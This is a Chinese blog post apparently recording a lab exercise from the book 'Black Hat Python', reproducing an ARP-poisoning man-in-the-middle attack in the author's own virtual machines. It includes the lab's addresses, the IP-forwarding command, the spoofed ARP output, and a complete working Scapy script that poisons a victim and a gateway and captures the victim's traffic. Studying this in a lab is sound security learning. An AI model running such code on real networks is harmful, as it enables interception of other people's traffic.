近期收到了电子工业出版社赠送的一本网络安全书籍《python黑帽子》,书中一共24个实验,今天复现第9个实验(arp投毒),我的测试环境是mbp电脑+kali虚拟机+centos虚拟机+conda开发环境。涉及到受害者 centos、攻击者 kali、观察者 mbp、网关,攻击者作为网关和受害者之间的中间人,既要欺骗受害者,说自己是网关,又要欺骗网关,说自己是受害者~
ailx10
网络安全优秀回答者
网络安全硕士
去咨询
1、检查我们原始的网关、受害者信息、攻击者信息、观察者信息
- 受害者 centos :192.168.0.105 (8:0:27:f9:f4:e)
- 攻击者 kali :192.168.0.103 (8:0:27:e7:67:1c)
- 观察者 mbp :192.168.0.101 (18:65:90:cb:f0:5d)
- 网关:192.168.0.1 (94:d9:b3:66:ef:5c)
2、在受害者centos 上先看一下,和观察者mbp 一样
3、在攻击者kali 上开启IP转发
echo 1 > /proc/sys/net/ipv4/ip_forward
4、在攻击者kali 上运行脚本
欺骗受害者,说网关192.168.0.1的MAC地址在08:00:27:e7:67:1c(实际上这个MAC地址是攻击者kali)
ip src:192.168.0.1
ip dst:192.168.0.105
mac dst:08:00:27:f9:f4:0e
mac src:08:00:27:e7:67:1c
ARP is at 08:00:27:e7:67:1c says 192.168.0.1
欺骗网关,说受害者192.168.0.105的MAC地址在08:00:27:e7:67:1c(实际上这个MAC地址是攻击者kali)
ip src:192.168.0.105
ip dst:192.168.0.1
mac dst:94:d9:b3:66:ef:5c
mac src:08:00:27:e7:67:1c
ARP is at 08:00:27:e7:67:1c says 192.168.0.105
5、在受害者上查看ARP表
ARP表中的网关MAC地址,已经变成了攻击者kali 的MAC地址了。看到这,就算实验成功了~
参考代码:
# -*- coding: utf-8 -*-
# @Time : 2022/6/6 10:39 PM
# @Author : ailx10
# @File : arper.py
from multiprocessing import Process
from scapy.all import sniff,conf,get_if_addr,send,sndrcv,srp,wrpcap
from scapy.layers.inet import Ether
from scapy.layers.l2 import ARP
import os
import sys
import time
def get_mac(targetip):
packet = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op="who-has",pdst=targetip)
resp,_ = srp(packet,timeout=2,retry=10,verbose=False)
for _,r in resp:
return r[Ether].src
return None
class Arper:
def __init__(self,victim,gateway,interface="en0"):
self.victim = victim
self.victimmac = get_mac(victim)
self.gateway = gateway
self.gatewaymac = get_mac(gateway)
self.interface = interface
conf.iface = interface
conf.verb = 0
conf.use_pcap = True
print(f"Initialized {interface}:")
print(f"Gateway ({gateway}) is at {self.gatewaymac}")
print(f"Victim ({victim}) is at {self.victimmac}")
print("-"*30)
def run(self):
self.poison_thread = Process(target=self.poison)
self.poison_thread.start()
self.sniff_thread = Process(target=self.sniff)
self.sniff_thread.start()
def poison(self):
# 构造欺骗受害者的ARP包,源IP地址是网关,源MAC地址是黑客,目的IP地址是受害者,目的MAC地址是受害者
poison_victim = ARP()
poison_victim.op = 2
poison_victim.psrc = self.gateway
poison_victim.pdst = self.victim
poison_victim.hwdst = self.victimmac
print(f"ip src:{poison_victim.psrc}")
print(f"ip dst:{poison_victim.pdst}")
print(f"mac dst:{poison_victim.hwdst}")
print(f"mac src:{poison_victim.hwsrc}")
print(poison_victim.summary())
print("-"*30)
# 构造欺骗网关的ARP包,源IP是受害者,源MAC地址是黑客,目的IP是网关,目的MAC地址是网关
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = self.victim
poison_gateway.pdst = self.gateway
poison_gateway.hwdst = self.gatewaymac
print(f"ip src:{poison_gateway.psrc}")
print(f"ip dst:{poison_gateway.pdst}")
print(f"mac dst:{poison_gateway.hwdst}")
print(f"mac src:{poison_gateway.hwsrc}")
print(poison_gateway.summary())
print("-"*30)
print(f"Beginning the ARP poison.[CTRL-C to stop]")
while True:
sys.stdout.write(".")
sys.stdout.flush()
try:
send(poison_victim)
send(poison_gateway)
except KeyboardInterrupt:
self.restore()
sys.exit()
else:
time.sleep(1)
def sniff(self,count=50):
time.sleep(5)
print(f"Sniffing {count} packets")
bpf_filter = "ip host %s"%self.victim
packets = sniff(count=count,filter=bpf_filter,iface=self.interface)
wrpcap("arper.pcap",packets)
print("Got the packets")
self.restore()
self.poison_thread.terminate()
print("Finished.")
def restore(self):
print("Restoring ARP tables...")
send(ARP(op=2,psrc=self.gateway,hwsrc=self.gatewaymac,pdst=self.victim,hwdst="ff:ff:ff:ff:ff:ff"),count=15)
send(ARP(op=2,psrc=self.victim,hwsrc=self.victimmac,pdst=self.gateway,hwdst="ff:ff:ff:ff:ff:ff"),count=15)
if __name__ == "__main__":
(victim,gateway,interface) = (sys.argv[1],sys.argv[2],sys.argv[3])
myarp = Arper(victim,gateway,interface)
myarp.run()
发布于 2022-06-07 06:51